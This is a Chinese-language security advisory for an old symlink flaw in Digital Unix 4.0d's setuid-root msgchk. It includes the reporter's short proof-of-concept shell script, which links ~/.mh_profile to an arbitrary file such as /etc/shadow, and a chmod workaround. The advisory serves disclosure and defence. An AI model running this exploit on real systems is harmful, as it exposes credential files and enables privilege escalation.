Digital Unix msgchk 未授权文件读取漏洞
发布日期:2001-09-10
更新日期:2001-09-11
受影响系统:
Digital Unix 4.0d
描述:
Digital Unix 4.0d所带的msgchk程序缺省被设置了suid root属性。它存在一个符号链接
漏洞,本地攻击者可以利用这个漏洞获取任意文件的第一行内容。
msgchk在读取用户主目录下的.mh_profile文件时,没有检查其是不是一个链接文件,因此
如果攻击者设置一个指向某未授权文件(例如/etc/shadow)的链接,就可能获取该文件的
第一行内容。攻击者可能利用这个漏洞进一步提升权限。
根据目前的报告,只知道4.0d受影响,其他4.0x未经测试但也可能受影响。
<*来源:SeungHyun Seo (
seo@igrus.inha.ac.kr)
链接:
http://archives.neohapsis.com/archives/bugtraq/2001-09/0064.html
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
SeungHyun Seo (
seo@igrus.inha.ac.kr)提供了如下测试代码:
++ msgchkx.sh
#!/bin/sh
# truefinder, seo@igrus.inha.ac.kr
# msgchk file read vulnerability
if [ ! -f $1 ]
then
echo "usage : $0 <file path>"
fi
cd ~
ln -sf $1 ~/.mh_profile
/usr/bin/mh/msgchk
建议:
临时解决方法:
去掉msgchk的suid root属性:
# chmod a-s /usr/bin/mh/msgchk
厂商补丁:
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商
的主页以获取最新版本:
http://www.tru64unix.compaq.com/
浏览次数:3632
严重程度:0(网友投票)